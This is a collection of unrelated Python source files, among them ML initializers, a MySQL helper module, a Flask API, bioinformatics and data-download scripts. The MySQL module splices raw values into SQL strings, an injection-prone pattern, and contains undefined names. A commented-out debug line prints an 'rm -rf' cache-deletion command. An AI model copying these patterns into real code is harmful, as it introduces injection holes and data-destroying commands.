assert fan_out is not None, 'Fan_out is not provided.'
fan = fan_out
else:
raise ValueError(f'Invalid initialization mode \'{mode}\'')
std = nn.init.calculate_gain(nonlinearity, a) / math.sqrt(fan)
return nn.init.normal_(tensor, 0, std)
return initializer
def xavier_uniform_(a: float = math.sqrt(3.), scale: float = 2., gain: float = 1.):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Understanding the difficulty of training deep feedforward
neural networks` - Glorot, X. & Bengio, Y. (2010), using a uniform
distribution. The resulting tensor will have values sampled from
:math:`\mathcal{U}(-a, a)` where
.. math::
a = \text{gain} \times \sqrt{\frac{6}{\text{fan_in} + \text{fan_out}}}
Also known as 'Glorot initialization'.
Args:
a (float, optional): an optional scaling factor used to calculate uniform
bounds from standard deviation. Defaults ``math.sqrt(3.)``.
scale (float, optional): an optional scaling factor used to calculate standard deviation. Defaults 2.0.
gain (float, optional): an optional scaling factor. Defaults 1.0.
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
if fan_out is not None:
fan += fan_out
std = gain * math.sqrt(scale / float(fan))
bound = a * std
return nn.init.uniform_(tensor, -bound, bound)
return initializer
def xavier_normal_(scale: float = 2., gain: float = 1.):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Understanding the difficulty of training deep feedforward
neural networks` - Glorot, X. & Bengio, Y. (2010), using a normal
distribution. The resulting tensor will have values sampled from
:math:`\mathcal{N}(0, \text{std}^2)` where
.. math::
\text{std} = \text{gain} \times \sqrt{\frac{2}{\text{fan_in} + \text{fan_out}}}
Also known as 'Glorot initialization'.
Args:
scale (float, optional): an optional scaling factor used to calculate standard deviation. Defaults 2.0.
gain (float, optional): an optional scaling factor. Defaults 1.0.
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
if fan_out is not None:
fan += fan_out
std = gain * math.sqrt(scale / float(fan))
return nn.init.normal_(tensor, 0., std)
return initializer
def lecun_uniform_():
# adapted from jax.nn.initializers
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
var = 1.0 / fan_in
bound = math.sqrt(3 * var)
return nn.init.uniform_(tensor, -bound, bound)
return initializer
def lecun_normal_():
# adapted from jax.nn.initializers
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
std = math.sqrt(1.0 / fan_in)
return nn.init.trunc_normal_(tensor, std=std / .87962566103423978)
return initializer | python |
#!/usr/bin/python
# Filename: mysqlfunc.py
# Purpose: All the mysql functions
# !!! need to encapsulate a cur with something like a using statement
# Database errors
import MySQLdb, pdb, logger, dnsCheck
from MySQLdb import Error
#All the variables for paths
from variables import *
def create_dbConnection():
try:
# trying to create a connection with the proceeding connection
a = MySQLdb.connect(user=databaseUser, passwd=databasePasswd, db=databaseName, unix_socket="/opt/lampp/var/mysql/mysql.sock")
return a
except Error as e:
print(e)
return None
def sqlExeCommit(statem):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute(statem)
conn.commit()
def sqlCommit(conn):
conn.commit()
# Only execute
def sqlExe(cur, statem):
cur.execute(statem)
# Execute return
def sqlExeRet(statem):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute(statem)
return cur.fetchall()
def sqlExeRetOne(statem):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute(statem)
return cur.fetchone()
# Returns the domains based on the domainRangeId
def domainsBydomainRangeId(id):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainName FROM Domains WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
results = []
for column in cur.fetchall():
results.append(column[0])
return results
# Returns the domains based on the domainRangeId
def domainIdsBydomainRangeId(id):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainId FROM Domains WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
results = []
for column in cur.fetchall():
results.append(int(column[0]))
return results
# Returns the domains based on the domainRangeId
def domainNameByDomainId(id):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainName FROM Domains WHERE domainId = %s"%str(id)
cur.execute(statem)
return cur.fetchone()[0]
# Return the domainRange value associated with the rangeId
def domainRangeByrangeId(cur, id):
statem = "SELECT domainRange FROM InScope WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
return cur.fetchone()[0]
# Return all scope Ids
def AllScopeIds(self):
conn = mysqlfunc.create_dbConnection()
cur = conn.cursor()
# Saving the programI
ScopeIds = []
# Grab all the InScopeIds based on the programName
statem = "SELECT domainRangeId FROM InScope"
cur.execute(statem)
for column in cur.fetchall():
ScopeIds.append(int(column[0]))
return ScopeIds
#Good for iterates on own commit
def insertDomain(domain, domainRangeId):
conn = create_dbConnection()
cur = conn.cursor()
# checkInternet
if dnsCheck.checkHostByName(domain):
# pdb catch in case something goes wrong
# Find ips
try:
# Insert into Domains
statem = "INSERT IGNORE INTO Domains(domainRangeId, domainName, dateFound) VALUES (%s, \"%s\", CURDATE())"%(domainRangeId, domain)
cur.execute(statem)
print '[+] New Domain:',domain
logger.logNewDomain(domain)
except Exception,e:
print e
pdb.set_trace()
# Commit
conn.commit()
def removeDomain(domain):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute('DELETE FROM Domains WHERE domainName like \'%s\''%(domain))
conn.commit()
def removeDomainArray(domainArray):
conn = create_dbConnection()
cur = conn.cursor()
for domain in domainArray:
cur.execute('DELETE FROM Ips WHERE domainId = (SELECT domainId FROM Domains where domainName = \'%s\')'%(domain))
cur.execute('DELETE FROM Domains WHERE domainName like \'%s\''%(domain))
conn.commit()
def returnAllDomains(cur):
statem = "SELECT domainName FROM Domains"
cur.execute(statem)
results = []
for column in cur.fetchall():
results.append(column[0])
return results
# Returns an Array of inScope Ids based onthe program
# oldName: returnInScopeIds
def InScopeIdsByProgramName(program):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainRangeId FROM InScope WHERE programId = (SELECT programId FROM Programs WHERE name = \"%s\")"%(program)
results = []
cur.execute(statem)
for a in cur.fetchall():
results.append(int(a[0]))
return results
def programNameByProgramId(programId):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT name from Programs WHERE programId = %s"%programId
cur.execute(statem)
return cur.fetchone()[0]
def ProgramIdByProgramName(programName):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT programId from Programs WHERE Programs = %s"%programId
cur.execute(statem)
return cur.fetchone()[0]
def blacklistedByDomainRangeId(cur, id):
statem = "SELECT blacklistedContent FROM BlacklistedDomains WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
results = []
for a in cur.fetchall():
results.append(a[0])
return results | python |
#!/usr/bin/env python
import functools
import os
import os.path
from datetime import timedelta
from functools import update_wrapper
from flask import Flask, abort, current_app, jsonify, make_response, request
import psycopg2
DATABASE = os.environ['POSTGRES_DB']
USERNAME = os.environ['POSTGRES_USER']
PASSWORD = os.environ['POSTGRES_PASSWORD']
QUERY_FORMAT = """
SELECT elect_div FROM com_elb WHERE
ST_Contains(geom, ST_SetSRID(ST_Point({longitude:f}, {latitude:f}), 4283))
"""
app = Flask(__name__)
if not app.debug:
import logging
from logging.handlers import RotatingFileHandler
logfile = os.path.expanduser('/home/docker/logs/division.log')
file_handler = RotatingFileHandler(logfile)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
translation_table = str.maketrans('', '', " -'")
def crossdomain(origin=None, methods=None, headers=None,
max_age=21600, attach_to_all=True,
automatic_options=True):
if methods is not None:
methods = ', '.join(sorted(x.upper() for x in methods))
if headers is not None and not isinstance(headers, str):
headers = ', '.join(x.upper() for x in headers)
if not isinstance(origin, str):
origin = ', '.join(origin)
if isinstance(max_age, timedelta):
max_age = max_age.total_seconds()
def get_methods():
if methods is not None:
return methods
options_resp = current_app.make_default_options_response()
return options_resp.headers['allow']
def decorator(f):
def wrapped_function(*args, **kwargs):
if automatic_options and request.method == 'OPTIONS':
resp = current_app.make_default_options_response()
else:
resp = make_response(f(*args, **kwargs))
if not attach_to_all and request.method != 'OPTIONS':
return resp
h = resp.headers
h['Access-Control-Allow-Origin'] = origin
h['Access-Control-Allow-Methods'] = get_methods()
h['Access-Control-Max-Age'] = str(max_age)
if headers is not None:
h['Access-Control-Allow-Headers'] = headers
return resp
f.provide_automatic_options = False
return update_wrapper(wrapped_function, f)
return decorator
@app.route('/division', methods=['GET', 'POST', 'OPTIONS'])
@crossdomain(origin='*', headers=['Content-Type', 'X-Requested-With'])
def division_lookup():
if request.json is None and request.method == 'POST':
abort(400, "Must provide JSON (did you set Content-type?)")
elif request.method == 'POST':
args = request.json
else:
args = request.args
if 'latitude' not in args:
abort(400, "Most provide latitude and longitude")
if 'longitude' not in args:
abort(400, "Most provide latitude and longitude")
conn = psycopg2.connect(host='postgres', database=DATABASE,
user=USERNAME, password=PASSWORD)
cursor = conn.cursor()
cursor.execute(QUERY_FORMAT.format(latitude=float(args['latitude']),
longitude=float(args['longitude'])))
result = cursor.fetchone()
if result is None:
name = None
else:
name = result[0].lower().translate(translation_table)
return jsonify({'division': name})
if __name__ == '__main__':
app.run(debug=True)
| python |
from botcity.core import DesktopBot
# Uncomment the line below for integrations with BotMaestro
# Using the Maestro SDK
# from botcity.maestro import *
class Bot(DesktopBot):
def action(self, execution=None):
# Fetch the Activity ID from the task:
# task = self.maestro.get_task(execution.task_id)
# activity_id = task.activity_id
# Opens the BotCity website.
self.browse("http://www.botcity.dev")
# Uncomment to mark this task as finished on BotMaestro
# self.maestro.finish_task(
# task_id=execution.task_id,
# status=AutomationTaskFinishStatus.SUCCESS,
# message="Task Finished OK."
# )
def not_found(self, label):
print(f"Element not found: {label}")
if __name__ == '__main__':
Bot.main()
| python |
import os
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from ibm_watson import PersonalityInsightsV3
from services.base import BaseService, BaseServiceResult
class IBMWatson(BaseService):
"""
IBM Watson service wrapper
"""
def __init__(self, service_wrapper, service_url):
"""
Initiate the service engine
:param service_wrapper: IBM Watson service engine
:type service_wrapper: PersonalityInsightsV3
:param service_url: IBM Watson service URL address
:type service_url: str
"""
super().__init__("ibm", service_url)
self.service = service_wrapper
def get_personality_scores(self, text_content):
"""
Get personality scores from textual content
:param text_content: Textual data of minimum 100 words
:type text_content: str
:return: Results from service engine
:rtype: dict
"""
result = self.service.profile(
{"contentItems": [{"content": text_content}]},
accept="application/json",
raw_scores=True,
consumption_preferences=True,
).get_result()
return BaseServiceResult(200, result)
PERSONALITY_API_KEY = os.getenv("PERSONALITY_API_KEY")
PERSONALITY_URL = os.getenv("PERSONALITY_URL")
PERSONALITY_ENGINE = PersonalityInsightsV3(
version="2017-10-13", authenticator=IAMAuthenticator(apikey=PERSONALITY_API_KEY)
)
PERSONALITY_ENGINE.set_service_url(PERSONALITY_URL)
IBMWatsonService = IBMWatson(PERSONALITY_ENGINE, PERSONALITY_URL)
| python |
#!/usr/bin/python3
# creates the SQLite database file - run this first
import sqlite3
# create db file
con = sqlite3.connect('./db/ic_log1_2020-06-30_manual.db')
cur = con.cursor()
# create table
cur.execute('''CREATE TABLE IF NOT EXISTS iclog (date real, ic integer, note text)''')
# close the connection
con.close()
'''
Legend:
date: a UNIX timestamp
ic: internet connection boolean true or false, 1 | 0
error: short description of the problem
'''
| python |
# -*- coding: utf-8 -*-
def main():
n, m = map(int, input().split())
summed = 4 * n - m
xy = list()
# 2x + 3y + 4z = M
# x + y + z = N を解く
# See:
# https://atcoder.jp/contests/abc006/submissions/1112016
# WAの原因:成立しない条件の境界値を0以下だと思っていた,2項目の条件に気がつけなかった
if summed < 0:
print(-1, -1, -1)
exit()
# xを決め打ち
for x in range(summed // 2 + 1):
y = summed - 2 * x
if y >= 0:
xy.append((x, y))
for x, y in xy:
z = n - (x + y)
if z >= 0:
print(x, y, z)
exit()
print(-1, -1, -1)
if __name__ == '__main__':
main()
| python |
#!/usr/bin/env python
"""
--------------------------------------------------------------------------------
Created: Jackson Lee 7/8/14
This script reads in a fasta or fastq and filters for sequences greater or less
than a threshold length
Input fastq file
@2402:1:1101:1392:2236/2
GATAGTCTTCGGCGCCATCGTCATCCTCTACACCCTCAAGGCGAGCGGCGCGATGGAGACAATCCAGTGGGGCATGCAGCAGGTGACACCGGACTCCCGGATCCA
+
@@CFFFFFGHHHHIJJIIJIHIJIIIIJIIGEIJJIJJJJJIIIJHFFDDBD8BBD>BCBCCDDDCDCCCDBDDDDDDDDDDD<CDDDDDDDDBBCDDBD<<BDD
--------------------------------------------------------------------------------
usage: filter_fasta_by_len.py -i sequence.fasta -g filter_greater_than -l filter_less_than
"""
#-------------------------------------------------------------------------------
#Header - Linkers, Libs, Constants
from string import strip
from Bio import SeqIO
from argparse import ArgumentParser, RawDescriptionHelpFormatter
#-------------------------------------------------------------------------------
#function declarations
def process_and_generate(input_iterator, threshold, greaterflag):
"""Reusable function that processes a record, then generates each record.
input_iterator is an iterator that returns one record at a time
process_function is a function that takes one record and does some
processing on it
"""
for rec in input_iterator:
if greaterflag:
if len(rec.seq) <= threshold:
yield rec
else:
if len(rec.seq) >= threshold:
yield rec
#-------------------------------------------------------------------------------
#Body
print "Running..."
if __name__ == '__main__':
parser = ArgumentParser(usage = "filter_fasta_by_len.py -i sequence.fasta -g filter_greater_than -l filter_less_than",
description=__doc__,
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-i", "--input_fastq", action="store",
dest="inputfilename",
help="fastq file of input sequences")
parser.add_argument("-g", "--filter_greater_than", action="store", type=int,
dest="greaterthan",
help="filter out sequences greater than or equal to \
this size")
parser.add_argument("-l", "--filter_less_than", action="store", type=int,
dest="lessthan",
help="filter out sequences less than or equal this size")
options = parser.parse_args()
mandatories = ["inputfilename"]
for m in mandatories:
if not options.__dict__[m]:
print "\nError: Missing Arguments\n"
parser.print_help()
exit(-1)
inputfilename = options.inputfilename
left, __, right = inputfilename.rpartition('.')
fasta =['fa','fasta','faa','fas', 'fna']
fastq =['fq','fastq']
if right in fasta:
ext = "fasta"
elif right in fastq:
ext = "fastq"
print "Processing read file: " + inputfilename
with open(inputfilename,'U') as infile:
parse_iterator = SeqIO.parse(infile, ext)
if options.greaterthan == None and options.lessthan == None:
print "\nError: Missing Comparison Value\n"
parser.print_help()
exit(-1)
elif options.greaterthan == None and options.lessthan != None:
lessthan = options.lessthan
print "and filtering out sequences less than ", lessthan
outputfilename = left + '.filtered.lessthan.' + str(lessthan) + "." + right
with open(outputfilename, 'w') as outfile:
record_generator = process_and_generate(parse_iterator, lessthan, False)
SeqIO.write(record_generator, outfile, ext)
elif options.greaterthan != None and options.lessthan == None:
greaterthan = options.greaterthan
print "and filtering out sequences greater than ", greaterthan
outputfilename = left + '.filtered.greaterthan.' + str(greaterthan) + "." + right
with open(outputfilename, 'w') as outfile:
record_generator = process_and_generate(parse_iterator, greaterthan, True)
SeqIO.write(record_generator, outfile, ext)
elif options.greaterthan != None and options.lessthan != None:
greaterthan = options.greaterthan
lessthan = options.lessthan
print "and filtering out sequences less than ", lessthan, " and greater than ", greaterthan
outputfilename = left + '.filtered.greaterthan.' + str(greaterthan) + ".filtered.lessthan." + str(lessthan) + '.' + right
with open(outputfilename, 'w') as outfile:
pre_record_generator = process_and_generate(parse_iterator, greaterthan, True)
record_generator = process_and_generate(pre_record_generator, lessthan, False)
SeqIO.write(record_generator, outfile, ext)
print "Done!"
| python |
import numpy as np
from os import listdir
from os.path import join
#def random_shift_events(events, max_shift=20, resolution=(180, 240)):
def random_shift_events(events, f, max_shift=20, resolution=(195, 346)):
H, W = resolution
x_shift, y_shift = np.random.randint(-max_shift, max_shift+1, size=(2,))
#print('rm -rf ~/cachefs/erl/' + f)
#print(events.shape)
#print(events[:,0])
#print(events[:,1])
events[:,0] += x_shift
events[:,1] += y_shift
valid_events = (events[:,0] >= 0) & (events[:,0] < W) & (events[:,1] >= 0) & (events[:,1] < H)
events = events[valid_events]
return events
#def random_flip_events_along_x(events, resolution=(180, 240), p=0.5):
def random_flip_events_along_x(events, resolution=(195, 346), p=0.5):
H, W = resolution
if np.random.random() < p:
events[:,0] = W - 1 - events[:,0]
return events
class NCaltech101:
def __init__(self, root, augmentation=False):
self.classes = listdir(root)
self.files = []
self.labels = []
self.augmentation = augmentation
for i, c in enumerate(self.classes):
new_files = [join(root, c, f) for f in listdir(join(root, c))]
self.files += new_files
self.labels += [i] * len(new_files)
def __len__(self):
return len(self.files)
def __getitem__(self, idx):
"""
returns events and label, loading events from aedat
:param idx:
:return: x,y,t,p, label
"""
label = self.labels[idx]
f = self.files[idx]
#print('rm -rf ~/cachefs/erl/' + f)
events = np.load(f).astype(np.float32)
if self.augmentation:
events = random_shift_events(events, f)
events = random_flip_events_along_x(events)
return events, label
| python |
import json
import cryptography.fernet
from django.conf import settings
from django.utils.encoding import force_bytes, force_text
from django_pgjson.fields import get_encoder_class
import six
# Allow the use of key rotation
if isinstance(settings.FIELD_ENCRYPTION_KEY, (tuple, list)):
keys = [
cryptography.fernet.Fernet(k)
for k in settings.FIELD_ENCRYPTION_KEY
]
elif isinstance(settings.FIELD_ENCRYPTION_KEY, dict):
# allow the keys to be indexed in a dictionary
keys = [
cryptography.fernet.Fernet(k)
for k in settings.FIELD_ENCRYPTION_KEY.values()
]
else:
# else turn the single key into a list of one
keys = [cryptography.fernet.Fernet(settings.FIELD_ENCRYPTION_KEY), ]
crypter = cryptography.fernet.MultiFernet(keys)
def no_op_encrypt_values(data, encrypter=None, skip_keys=None):
"""
A noop function with the same call signature of `encrypt_values`.
Returns:
obj - returns the data parameter unaltered.
"""
return data
def pick_encrypter(key, keys, encrypter):
"""
Returns encrypting function.
To facilitate skipping keys during encryption we need to pick between the
encrypting function or a noop funciton.
Returns:
function
"""
if key in keys:
return no_op_encrypt_values
return encrypter
def encrypt_values(data, encrypter=None, skip_keys=None):
"""
Returns data with values it contains recursively encrypted.
Note that this will use `json.dumps` to convert the data to a string type.
The encoder class will be the value of `PGJSON_ENCODER_CLASS` in the
settings or `django.core.serializers.json.DjangoJSONEncoder`.
Arguments:
data (object): the data to decrypt.
encrypter (function): the decryption function to use. If not
specified it will use the
cryptography.fernet.MultiFernetMultiFernet.encrypt method
with the keys being taken from settings.FIELD_ENCRYPTION_KEY
skip_keys (list[str]): a list of keys that should not be encrypted
Returns:
object
"""
if skip_keys is None:
skip_keys = []
encrypter = encrypter or crypter.encrypt
if isinstance(data, (list, tuple, set)):
return [encrypt_values(x, encrypter, skip_keys) for x in data]
if isinstance(data, dict):
return {
key: pick_encrypter(key, skip_keys, encrypt_values)(
value, encrypter, skip_keys)
for key, value in six.iteritems(data)
}
if isinstance(data, six.string_types):
return force_text(encrypter(data.encode('unicode_escape')))
return force_text(encrypter(
force_bytes(json.dumps(data, cls=get_encoder_class()))
))
def decrypt_values(data, decrypter=None):
"""
Returns data with values it contains recursively decrypted.
Note that this will use `json.loads` to convert the decrypted data to
its most likely python type.
Arguments:
data (object): the data to decrypt.
decrypter (function): the decryption function to use. If not
specified it will use the
cryptography.fernet.MultiFernetMultiFernet.decrypt method
with the keys being taken from settings.FIELD_ENCRYPTION_KEY
Returns:
object
"""
decrypter = decrypter or crypter.decrypt
if isinstance(data, (list, tuple, set)):
return [decrypt_values(x, decrypter) for x in data]
if isinstance(data, dict):
return {
key: decrypt_values(value, decrypter)
for key, value in six.iteritems(data)
}
if isinstance(data, six.string_types):
# string data! if we got a string or unicode convert it to
# bytes first, as per http://stackoverflow.com/a/11174804.
#
# Note 1: This is required for the decrypter, it only accepts bytes.
# Note 2: this is primarily needed because the decrypt method is called
# on the value during the save as well as during the read, by the
# django ORM.
data = data.encode('unicode_escape')
try:
# decrypt the bytes data
value = decrypter(data)
except TypeError:
# Not bytes data??! probably from a django field calling
# to_python during value assignment
value = data
except cryptography.fernet.InvalidToken:
# Either the data is corrupted, e.g. a lost key or the data
# was never encrypted, this could be from django calling to_python
# during value assignment.
value = data
try:
# undo the unicode mess from earlier
value = value.decode('unicode_escape')
except AttributeError:
pass
try:
return json.loads(value)
except (ValueError, TypeError):
# Not valid json, just return the value
return value
| python |
from pptx import Presentation
from pptx.util import Inches
import pyexcel as pe
print("""
Exemplo de criação de apresentação PPTX em loop utilizando dados de Excel
Vish, o bagulho foi loko pra conseguir criar este aplicativo mano
-> agora aprendi, já era
Day 24 Code Python - 23/05/2018
""")
dadosExcel = pe.iget_records(file_name="apresentacao_automatica.xlsx") # tentar criar uma função
prs = Presentation() # se for ler um PPTX, passar como parâmetro
title_only_slide_layout = prs.slide_layouts[5]
slide = prs.slides.add_slide(title_only_slide_layout)
shapes = slide.shapes
shapes.title.text = 'Idades -> Feito com Python'
# configuração de colunas e celulas --> ainda preciso descobrir como automatizar estes tamanhos porque o bagulho tá loko
rows = 5
cols = 2
left = top = Inches(2.0)
width = Inches(6.0)
height = Inches(0.8)
table = shapes.add_table(rows, cols, left, top, width, height).table
# tamanho das colunas
table.columns[0].width = Inches(3.0)
table.columns[1].width = Inches(2.0)
# nome das colunas - fixo na posição 0
table.cell(0, 0).text = 'Nome'
table.cell(0, 1).text = 'Idade'
nome = []
idade = []
cont = 1
for itens in dadosExcel:
# escrevendo os dados na células
if cont > 0: # o 0 sempre será o header, e este é fixo.
table.cell(cont, 0).text = str(itens['nome'])
table.cell(cont, 1).text = str(itens['idade'])
cont += 1
# liberando o recurso, iiirraaaaa
pe.free_resources()
# salvando o arquivo pptx
prs.save('apresentacao_tabela_automatica.pptx')
print('-' * 34)
print('APRESENTAÇÃO CRIADA COM SUCESSO.')
| python |
"""
This sample shows how to create a list in json
of all items in a group
Python 2.x/3.x
ArcREST 3.5,6
"""
from __future__ import print_function
from __future__ import absolute_import
import arcrest
import os
import json
from arcresthelper import orgtools, common
import csv
import sys
from arcresthelper.packages import six
def trace():
"""
trace finds the line, the filename
and error message and returns it
to the user
"""
import traceback, inspect,sys
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
filename = inspect.getfile(inspect.currentframe())
# script name + line number
line = tbinfo.split(", ")[1]
# Get Python syntax error
#
synerror = traceback.format_exc().splitlines()[-1]
return line, filename, synerror
def _unicode_convert(obj):
""" converts unicode to anscii """
if isinstance(obj, dict):
return {_unicode_convert(key): _unicode_convert(value) for key, value in obj.items()}
elif isinstance(obj, list):
return [_unicode_convert(element) for element in obj]
elif isinstance(obj, str):
return obj
elif isinstance(obj, six.text_type):
return obj.encode('utf-8')
elif isinstance(obj, six.integer_types):
return obj
else:
return obj
if __name__ == "__main__":
proxy_port = None
proxy_url = None
securityinfo = {}
securityinfo['security_type'] = 'Portal'#LDAP, NTLM, OAuth, Portal, PKI
securityinfo['username'] = ""#<UserName>
securityinfo['password'] = ""#<Password>
securityinfo['org_url'] = "http://www.arcgis.com"
securityinfo['proxy_url'] = proxy_url
securityinfo['proxy_port'] = proxy_port
securityinfo['referer_url'] = None
securityinfo['token_url'] = None
securityinfo['certificatefile'] = None
securityinfo['keyfile'] = None
securityinfo['client_id'] = None
securityinfo['secret_id'] = None
groups = ["Demographic Content"] #Name of groups
outputlocation = r"C:\TEMP"
outputfilename = "group.json"
outputitemID = "id.csv"
try:
orgt = orgtools.orgtools(securityinfo)
groupRes = []
if orgt.valid:
fileName = os.path.join(outputlocation,outputfilename)
csvFile = os.path.join(outputlocation,outputitemID)
iconPath = os.path.join(outputlocation,"icons")
if not os.path.exists(iconPath):
os.makedirs(iconPath)
if sys.version_info[0] == 2:
access = 'wb+'
kwargs = {}
else:
access = 'wt+'
kwargs = {'newline':''}
file = open(fileName, "w")
with open(fileName, access, **kwargs) as csvFile:
idwriter = csv.writer(csvFile)
for groupName in groups:
results = orgt.getGroupContent(groupName=groupName,
onlyInOrg=True,
onlyInUser=True)
if not results is None:
for result in results:
idwriter.writerow([result['title'],result['id']])
thumbLocal = orgt.getThumbnailForItem(itemId=result['id'],
fileName=result['title'],
filePath=iconPath)
result['thumbnail']=thumbLocal
groupRes.append(result)
if len(groupRes) > 0:
print ("%s items found" % str(len(groupRes)))
groupRes = _unicode_convert(groupRes)
file.write(json.dumps(groupRes, ensure_ascii=False, sort_keys=True, indent=4, separators=(',', ': ')))
file.close()
except (common.ArcRestHelperError) as e:
print ("error in function: %s" % e[0]['function'])
print ("error on line: %s" % e[0]['line'])
print ("error in file name: %s" % e[0]['filename'])
print ("with error message: %s" % e[0]['synerror'])
if 'arcpyError' in e[0]:
print ("with arcpy message: %s" % e[0]['arcpyError'])
except:
line, filename, synerror = trace()
print ("error on line: %s" % line)
print ("error in file name: %s" % filename)
print ("with error message: %s" % synerror) | python |
def get_customized_mapping(cls):
mapping = {
"name": {
"type": "text",
"copy_to": [
"all"
]
},
"is_public": {
"type": "boolean"
},
"taxid": {
"type": "integer"
},
"genes": {
"properties": {
"mygene_id": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"symbol": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"ncbigene": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"ensemblgene": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"uniprot": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"name": {
"type": "text"
}
}
},
"reactome": {
"properties": {
"id": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword",
"copy_to": [
"all"
]
},
"geneset_name": {
"type": "text"
}
}
}
}
return mapping
| python |
#!/usr/bin/env python
#
# Copyright (C) 2007 British Broadcasting Corporation and Kamaelia Contributors(1)
# All Rights Reserved.
#
# You may only modify and redistribute this under the terms of any of the
# following licenses(2): Mozilla Public License, V1.1, GNU General
# Public License, V2.0, GNU Lesser General Public License, V2.1
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://kamaelia.sourceforge.net/AUTHORS - please extend this file,
# not this notice.
# (2) Reproduced in the COPYING file, and at:
# http://kamaelia.sourceforge.net/COPYING
# Under section 3.5 of the MPL, we are using this text since we deem the MPL
# notice inappropriate for this file. As per MPL/GPL/LGPL removal of this
# notice is prohibited.
#
# Please contact us via: [email protected]
# to discuss alternative licensing.
# -------------------------------------------------------------------------
#
from Kamaelia.UI.Pygame.Button import Button
from Kamaelia.Chassis.Graphline import Graphline
colours = { "black" : (0,0,0),
"red" : (192,0,0),
"orange" : (192,96,0),
"yellow" : (160,160,0),
"green" : (0,192,0),
"turquoise" : (0,160,160),
"blue": (0,0,255),
"purple" : (192,0,192),
"darkgrey" : (96,96,96),
"lightgrey" :(192,192,192),
}
def buildPalette(cols, order, topleft=(0,0), size=32):
buttons = {}
links = {}
pos = topleft
i=0
# Interesting/neat trick MPS
for col in order:
buttons[col] = Button(caption="", position=pos, size=(size,size), bgcolour=cols[col], msg=cols[col])
links[ (col,"outbox") ] = ("self","outbox")
pos = (pos[0] + size, pos[1])
i=i+1
return Graphline( linkages = links, **buttons )
| python |
#!/usr/bin/env python
from qiskit import QuantumProgram
Circuit = 'oneBitFullAdderCircuit'
# Create the quantum program
qp = QuantumProgram()
# Creating registers
n_qubits = 5
qr = qp.create_quantum_register("qr", n_qubits)
cr = qp.create_classical_register("cr", n_qubits)
# One-bit full adder circuit, where:
# qr[0], qr[1] are the bits to add
# qr[2] is the carry_in
# qr[3] is the result
# qr[4] is the carry_out
obc = qp.create_circuit(Circuit, [qr], [cr])
# Prepare bits to add
obc.h(qr[0])
obc.h(qr[1])
obc.h(qr[2])
# The result in qr[3]
obc.cx(qr[0], qr[3])
obc.cx(qr[1], qr[3])
obc.cx(qr[2], qr[3])
# The carry_out in qr[4]
obc.ccx(qr[0], qr[1], qr[4])
obc.ccx(qr[0], qr[2], qr[4])
obc.ccx(qr[1], qr[2], qr[4])
# Measure
for i in range(0, n_qubits):
obc.measure(qr[i], cr[i])
# Get qasm source
source = qp.get_qasm(Circuit)
print(source)
# Compile and run
backend = 'local_qasm_simulator'
circuits = [Circuit] # Group of circuits to execute
qobj = qp.compile(circuits, backend) # Compile your program
result = qp.run(qobj, wait=2, timeout=240)
print(result)
print(result.get_counts(Circuit))
| python |
"""add degree denormalizations
Revision ID: 38c7982f4160
Revises: 59d7b4f94cdf
Create Date: 2014-09-11 20:32:37.987989
"""
# revision identifiers, used by Alembic.
revision = '38c7982f4160'
down_revision = '59d7b4f94cdf'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column(u'grano_entity', sa.Column('degree_in', sa.Integer(), nullable=True))
op.add_column(u'grano_entity', sa.Column('degree_out', sa.Integer(), nullable=True))
op.add_column(u'grano_entity', sa.Column('degree', sa.Integer(), nullable=True))
def downgrade():
op.drop_column(u'grano_entity', 'degree_out')
op.drop_column(u'grano_entity', 'degree_in')
op.drop_column(u'grano_entity', 'degree')
| python |
from protodata.serialization_ops import SerializeSettings
from protodata.reading_ops import DataSettings
from protodata.utils import create_dir
from protodata.data_ops import NumericColumn, split_data, feature_normalize, \
map_feature_type, float64_feature, int64_feature
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import logging
from six.moves import urllib
DATA_FILE_NAME = 'sonar.npy'
DATA_URL = 'https://archive.ics.uci.edu/ml/machine-learning-databases/undocumented/connectionist-bench/sonar/sonar.all-data' # noqa
logger = logging.getLogger(__name__)
class SonarSerialize(SerializeSettings):
def __init__(self, data_path):
""" See base class """
super(SonarSerialize, self).__init__(data_path)
create_dir(data_path)
# On-demand download if it does not exist
if not is_downloaded(data_path):
logger.info('Downloading Sonar dataset ...')
urllib.request.urlretrieve(DATA_URL, get_data_path(data_path))
def read(self):
self.data = pd.read_csv(get_data_path(self.data_path), header=None)
